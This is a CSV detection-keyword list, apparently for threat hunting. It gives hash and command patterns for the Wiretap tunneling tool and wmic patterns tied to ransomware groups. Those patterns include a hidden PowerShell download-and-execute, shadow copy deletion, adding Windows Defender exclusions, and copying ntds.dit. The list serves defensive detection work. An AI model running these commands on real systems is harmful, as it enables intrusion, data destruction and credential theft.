"*0183a78b64841b968eac59c0c912ecb0c44ec0ccdd773e422c6529d4e0ea5ca3*",".{0,1000}0183a78b64841b968eac59c0c912ecb0c44ec0ccdd773e422c6529d4e0ea5ca3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*071c1ac9622484472732bfb85fdf11bf4a62d70d4f5d2aeed5a92e9e8be51346*",".{0,1000}071c1ac9622484472732bfb85fdf11bf4a62d70d4f5d2aeed5a92e9e8be51346.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*072c59c3bc429c761425c680611cc35c189582d6837d4b2bd205c648722b51de*",".{0,1000}072c59c3bc429c761425c680611cc35c189582d6837d4b2bd205c648722b51de.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*0b3128b7117e4575cd58267525750053b8ad2abbff38d586faa4e2b72c7a31db*",".{0,1000}0b3128b7117e4575cd58267525750053b8ad2abbff38d586faa4e2b72c7a31db.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*0fe131b5d680b328dd8c3286d6c300b0bd606373d3a2de0e6ebec613528bf65d*",".{0,1000}0fe131b5d680b328dd8c3286d6c300b0bd606373d3a2de0e6ebec613528bf65d.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*106be837e5aca74895a290d85bbcf90f95e4613f41de7d28f9fc834d8f34afad*",".{0,1000}106be837e5aca74895a290d85bbcf90f95e4613f41de7d28f9fc834d8f34afad.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*12d9cf76e82ea590777ee552a9ff96a10b6304df20b141bb2dc7bdf054be8402*",".{0,1000}12d9cf76e82ea590777ee552a9ff96a10b6304df20b141bb2dc7bdf054be8402.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*14ac418b893997f60d07f0b2ce81ac979ec6ba849664de462cef5c6c720e93f3*",".{0,1000}14ac418b893997f60d07f0b2ce81ac979ec6ba849664de462cef5c6c720e93f3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*1c7b04e5a15afed07071240ef6dfda584aede9f24e333463b6e00cdaa3886fc5*",".{0,1000}1c7b04e5a15afed07071240ef6dfda584aede9f24e333463b6e00cdaa3886fc5.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*1caf54aea406542836d678b35daef36f7dab5c6b271cc9333bf9132fb9a11b5a*",".{0,1000}1caf54aea406542836d678b35daef36f7dab5c6b271cc9333bf9132fb9a11b5a.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*256ade9e6d03ca6e485f0932c122dbd226762d2c29c07414d0dc1dcac2a4eb0b*",".{0,1000}256ade9e6d03ca6e485f0932c122dbd226762d2c29c07414d0dc1dcac2a4eb0b.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*2d042ee6e000dbf50b37b2fe8a77fb8cc71de9b4beb0f6f902b4d0885ae8facf*",".{0,1000}2d042ee6e000dbf50b37b2fe8a77fb8cc71de9b4beb0f6f902b4d0885ae8facf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*2d87b8f3d0a56c9e101271c83e0b4c8f243af14a10965619d037210900304dde*",".{0,1000}2d87b8f3d0a56c9e101271c83e0b4c8f243af14a10965619d037210900304dde.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*35fb32ecde0afcac0b1feb446052674763484264adae6c09148f4a0c7adac433*",".{0,1000}35fb32ecde0afcac0b1feb446052674763484264adae6c09148f4a0c7adac433.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*5141adc9e35e695f849f9f2a7749a428263d1a02e1efdf24547f53596be97a25*",".{0,1000}5141adc9e35e695f849f9f2a7749a428263d1a02e1efdf24547f53596be97a25.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*64601caa675146be542b3e4c658019f9c443c8fa64a898985aa691eab5c5037d*",".{0,1000}64601caa675146be542b3e4c658019f9c443c8fa64a898985aa691eab5c5037d.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*671eaebafae768f136c85087dca3ecc2068283e611f62345d152d843cfcf02ea*",".{0,1000}671eaebafae768f136c85087dca3ecc2068283e611f62345d152d843cfcf02ea.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*6e44d4eec61c35b14e9e43158b8a169269a98be0e2ae8992cdb0a50ea09b97a1*",".{0,1000}6e44d4eec61c35b14e9e43158b8a169269a98be0e2ae8992cdb0a50ea09b97a1.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*74ce40c0871314e1308984b12d93161faf806f6d508dd256678f09af1abc1052*",".{0,1000}74ce40c0871314e1308984b12d93161faf806f6d508dd256678f09af1abc1052.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*7ca32274aad66276fcbc12b50158356781277aa4efc50eee49c10f2eac192cef*",".{0,1000}7ca32274aad66276fcbc12b50158356781277aa4efc50eee49c10f2eac192cef.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*831096dedc1741e97c5a65d992cf8825a02bdcd43c76727d2a9d26638cfeedd3*",".{0,1000}831096dedc1741e97c5a65d992cf8825a02bdcd43c76727d2a9d26638cfeedd3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*8432faf9d944bcf430ebb7d45282f84901a59eb5e4ae3fc9b7ba5226b7a4ce35*",".{0,1000}8432faf9d944bcf430ebb7d45282f84901a59eb5e4ae3fc9b7ba5226b7a4ce35.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*8fcc7cb6eee6a29804ae22281e0477c47de9a924bd7beb9bed24f7c1d84d8a9d*",".{0,1000}8fcc7cb6eee6a29804ae22281e0477c47de9a924bd7beb9bed24f7c1d84d8a9d.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*9a6975a16e6abee257353caa0216c7ee50aed1618cb05c73ee105ecd07e0bdf3*",".{0,1000}9a6975a16e6abee257353caa0216c7ee50aed1618cb05c73ee105ecd07e0bdf3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*a059a3d56743994d8f3996e05725957ebb5099c97bdd8ee92ed739f552073f46*",".{0,1000}a059a3d56743994d8f3996e05725957ebb5099c97bdd8ee92ed739f552073f46.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*aa660d59e6c7783ebb9d4244d3991392ab602cd4fcd06457656bed2f61b7b51a*",".{0,1000}aa660d59e6c7783ebb9d4244d3991392ab602cd4fcd06457656bed2f61b7b51a.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*b1a6f85aa7693abc888ec5cd0313b16ae5e932dee4e04f495481935530276427*",".{0,1000}b1a6f85aa7693abc888ec5cd0313b16ae5e932dee4e04f495481935530276427.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*b710bdc87555b125cca39a89d2f41449b99afa567ec7e78f6e28b3f7bf872ac3*",".{0,1000}b710bdc87555b125cca39a89d2f41449b99afa567ec7e78f6e28b3f7bf872ac3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*c88212e7221a28d2877ba03c01c5df776c61aa4e36bc5a5909bceea7545fdfb1*",".{0,1000}c88212e7221a28d2877ba03c01c5df776c61aa4e36bc5a5909bceea7545fdfb1.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*chisel server --port *",".{0,1000}chisel\sserver\s\-\-port\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","chisel","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*d04679accb8ad4bbd940d7afcb4d2765c3ea1421bb773b71e79f3f0233f847cd*",".{0,1000}d04679accb8ad4bbd940d7afcb4d2765c3ea1421bb773b71e79f3f0233f847cd.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*d520c8bd60a9f8da3a90b1b47194dfb17df78554a97de633fda813c0152c01b1*",".{0,1000}d520c8bd60a9f8da3a90b1b47194dfb17df78554a97de633fda813c0152c01b1.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*d59838007c4724beca80ad34c6adc749c526f6de636d79e06565499d0e390110*",".{0,1000}d59838007c4724beca80ad34c6adc749c526f6de636d79e06565499d0e390110.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*docker exec -it wiretap-client-1 bash*",".{0,1000}docker\sexec\s\-it\swiretap\-client\-1\sbash.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*download.wireguard.com/windows-client/*",".{0,1000}download\.wireguard\.com\/windows\-client\/.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*eeee2b0a6ad1c7e4614fed4dfbe58b63776f6a3a6758267b5a976b4dc4315f48*",".{0,1000}eeee2b0a6ad1c7e4614fed4dfbe58b63776f6a3a6758267b5a976b4dc4315f48.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*f9ddbf1047c9a2e24310e5dc68508504c69e037e47c624f32b4d25ff8b30ed87*",".{0,1000}f9ddbf1047c9a2e24310e5dc68508504c69e037e47c624f32b4d25ff8b30ed87.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*fc901b9f783876c3cb057dbed28b5612fd376963f148d1375bb0c8cf86bb2e10*",".{0,1000}fc901b9f783876c3cb057dbed28b5612fd376963f148d1375bb0c8cf86bb2e10.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*https://www.wireguard.com/install*",".{0,1000}https\:\/\/www\.wireguard\.com\/install.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*sandialabs/wiretap*",".{0,1000}sandialabs\/wiretap.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*WireGuard/wireguard-go*",".{0,1000}WireGuard\/wireguard\-go.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*wiretap add client --port *",".{0,1000}wiretap\sadd\sclient\s\-\-port\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*wiretap add server --*",".{0,1000}wiretap\sadd\sserver\s\-\-.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*wiretap configure --*",".{0,1000}wiretap\sconfigure\s\-\-.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*wiretap expose --dynamic*",".{0,1000}wiretap\sexpose\s\-\-dynamic.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*wiretap expose list*",".{0,1000}wiretap\sexpose\slist.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*wiretap expose --local *",".{0,1000}wiretap\sexpose\s\-\-local\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*wiretap serve -f *",".{0,1000}wiretap\sserve\s\-f\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*WIRETAP_E2EE_INTERFACE_API*",".{0,1000}WIRETAP_E2EE_INTERFACE_API.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*WIRETAP_E2EE_PEER_ENDPOINT*",".{0,1000}WIRETAP_E2EE_PEER_ENDPOINT.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*WIRETAP_E2EE_PEER_PUBLICKEY*",".{0,1000}WIRETAP_E2EE_PEER_PUBLICKEY.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*WIRETAP_RELAY_INTERFACE_IPV4*",".{0,1000}WIRETAP_RELAY_INTERFACE_IPV4.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*WIRETAP_RELAY_INTERFACE_IPV6*",".{0,1000}WIRETAP_RELAY_INTERFACE_IPV6.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*WIRETAP_RELAY_PEER_ALLOWED*",".{0,1000}WIRETAP_RELAY_PEER_ALLOWED.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*WIRETAP_RELAY_PEER_PUBLICKEY*",".{0,1000}WIRETAP_RELAY_PEER_PUBLICKEY.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"*yum install *wireguard-*",".{0,1000}yum\sinstall\s.{0,1000}wireguard\-.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z"
"* process call create *cmd.exe /c powershell.exe -nop -w hidden -c *IEX ((new-object net.webclient).downloadstring('https://*",".{0,1000}\sprocess\scall\screate\s.{0,1000}cmd\.exe\s\/c\spowershell\.exe\s\-nop\s\-w\shidden\s\-c\s.{0,1000}IEX\s\(\(new\-object\snet\.webclient\)\.downloadstring\(\'https\:\/\/.{0,1000}","greyware_tool_keyword","wmic","Threat Actors ran the following command to download and execute a PowerShell payload","T1059.001 - T1059.003 - T1569.002 - T1021.006","TA0002 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*.exe shadowcopy delete*",".{0,1000}\.exe\sshadowcopy\sdelete.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*/NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True*",".{0,1000}\/NAMESPACE\:\\\\root\\Microsoft\\Windows\\Defender\sPATH\sMSFT_MpPreference\scall\sAdd\sExclusionExtension\=exe\sForce\=True.{0,1000}","greyware_tool_keyword","wmic","Windows Defender Tampering Via Wmic","T1489","TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Temp\*\ntds.dit*",".{0,1000}\\Temp\\.{0,1000}\\ntds\.dit.{0,1000}","greyware_tool_keyword","wmic","The NTDS.dit file is the heart of Active Directory including user accounts If it's found in the Temp directory it could indicate that an attacker has copied the file here in an attempt to extract sensitive information.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
